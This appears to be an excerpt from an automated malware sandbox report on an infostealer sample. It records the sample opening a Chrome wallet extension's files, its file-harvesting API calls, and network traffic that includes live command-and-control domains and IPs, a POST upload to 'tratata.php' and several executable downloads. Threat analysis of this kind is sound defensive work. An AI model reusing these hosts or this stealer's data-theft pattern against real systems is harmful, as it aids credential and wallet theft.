                        Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000017.00000003.415129432.00000000053B0000.00000004.00000040.sdmp
                        Source: Binary string: apphelp.pdb source: WerFault.exe, 00000017.00000003.415113248.00000000052A1000.00000004.00000001.sdmp
                        Source: Binary string: C:\malomazasuk.pdb source: DACD.exe, 00000016.00000000.405871178.0000000000401000.00000020.00020000.sdmp
                        Source: Binary string: wuser32.pdb source: WerFault.exe, 00000017.00000003.415129432.00000000053B0000.00000004.00000040.sdmp
Source: C:\Users\user\AppData\Local\Temp\DACD.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\Temp\DACD.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\Temp\DACD.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\DACD.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\AppData\Local\Temp\DACD.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\Temp\DACD.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\

Source: C:\Users\user\AppData\Local\Temp\AD19.exe | Code function 13_2_00419760: BuildCommDCBAndTimeoutsA,CreateMailslotW,GetNamedPipeHandleStateA,ReleaseSemaphore,FindAtomA,TzSpecificLocalTimeToSystemTime,GlobalHandle,SetConsoleCursorInfo,TlsSetValue,CopyFileW,GetLongPathNameA,SetVolumeMountPointA,GetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExA
Source: C:\Users\user\AppData\Local\Temp\DACD.exe | Code function 22_2_00405E40: wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\DACD.exe | Code function 22_2_00401280: wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\DACD.exe | Code function 22_2_00401090: SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\DACD.exe | Code function 22_2_00409B40: wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\DACD.exe | Code function 22_2_004087E0: wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\DACD.exe | Code function 22_2_004096E0: wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\DACD.exe | Code function 22_2_00409970: wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose

                        Networking:

                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\explorer.exe Domain query: bitly.com
                        Source: C:\Windows\explorer.exe Domain query: cdn.discordapp.com
                        Source: C:\Windows\explorer.exe Domain query: unicupload.top
                        Source: C:\Windows\explorer.exe Network Connect: 185.233.81.115 187
                        Source: C:\Windows\explorer.exe Domain query: f0616387.xsph.ru
                        Source: C:\Windows\explorer.exe Network Connect: 185.7.214.171 144
                        Source: C:\Windows\explorer.exe Domain query: host-data-coin-11.com
                        Source: C:\Windows\explorer.exe Domain query: bit.ly
                        Source: C:\Windows\explorer.exe Domain query: goo.su
                        Source: C:\Windows\explorer.exe Domain query: transfer.sh
                        Source: C:\Windows\explorer.exe Network Connect: 185.186.142.166 80
                        Source: C:\Windows\explorer.exe Domain query: privacytools-foryou-777.com
                        Source: C:\Windows\explorer.exe Domain query: data-host-coin-8.com
                        Source: global traffic HTTP traffic detected: GET /tratata.php HTTP/1.1 Host: file-file-host4.com Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: GET /sqlite3.dll HTTP/1.1 Host: file-file-host4.com Cache-Control: no-cache Cookie: PHPSESSID=dssnulsk4q345etur6fdlaaidu
                        Source: global traffic HTTP traffic detected: POST /tratata.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----VKNYUK68YUSRQI58 Host: file-file-host4.com Content-Length: 92575 Connection: Keep-Alive Cache-Control: no-cache Cookie: PHPSESSID=dssnulsk4q345etur6fdlaaidu
                        Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Thu, 06 Jan 2022 07:08:50 GMT Content-Type: application/x-msdos-program Content-Length: 307712 Connection: close Last-Modified: Thu, 06 Jan 2022 07:08:02 GMT ETag: "4b200-5d4e487f6726a" Accept-Ranges: bytes
                        Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Thu, 06 Jan 2022 07:08:56 GMT Content-Type: application/x-msdos-program Content-Length: 358912 Connection: close Last-Modified: Mon, 03 Jan 2022 22:00:28 GMT ETag: "57a00-5d4b4a60838eb" Accept-Ranges: bytes
                        Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Thu, 06 Jan 2022 07:09:02 GMT Content-Type: application/x-msdos-program Content-Length: 309760 Connection: close Last-Modified: Thu, 06 Jan 2022 07:09:02 GMT ETag: W/"4ba00-5d4e48b866eed" Accept-Ranges: bytes
                        Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Thu, 06 Jan 2022 07:09:07 GMT Content-Type: application/x-msdos-program Content-Length: 645592 Connection: close Last-Modified: Wed, 08 Dec 2021 03:32:46 GMT ETag: "9d9d8-5d29a24b21380" Accept-Ranges: bytes
                        Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Thu, 06 Jan 2022 07:09:55 GMT Server: Apache/2.4.18 (Ubuntu) Last-Modified: Wed, 05 Jan 2022 20:17:14 GMT ETag: "97fd0-5d4db70843dbb" Accept-Ranges: bytes Content-Length: 622544 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program
                        Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Thu, 06 Jan 2022 07:09:59 GMT Content-Type: application/x-msdos-program Content-Length: 760832 Connection: close Last-Modified: Sun, 02 Jan 2022 14:19:12 GMT ETag: "b9c00-5d49a1695789b" Accept-Ranges: bytes
                        Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: openresty Date: Thu, 06 Jan 2022 07:10:04 GMT Content-Type: application/octet-stream Content-Length: 1403392 Last-Modified: Wed, 05 Jan 2022 17:13:47 GMT Connection: keep-alive ETag: "61d5d1cb-156a00" Expires: Thu, 13 Jan 2022 07:10:04 GMT Cache-Control: max-age=604800 Accept-Ranges: bytes
                        Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Thu, 06 Jan 2022 07:10:07 GMT Content-Type: application/x-msdos-program Content-Length: 3573248 Connection: close Last-Modified: Wed, 05 Jan 2022 23:21:51 GMT ETag: "368600-5d4de04c9d13b" Accept-Ranges: bytes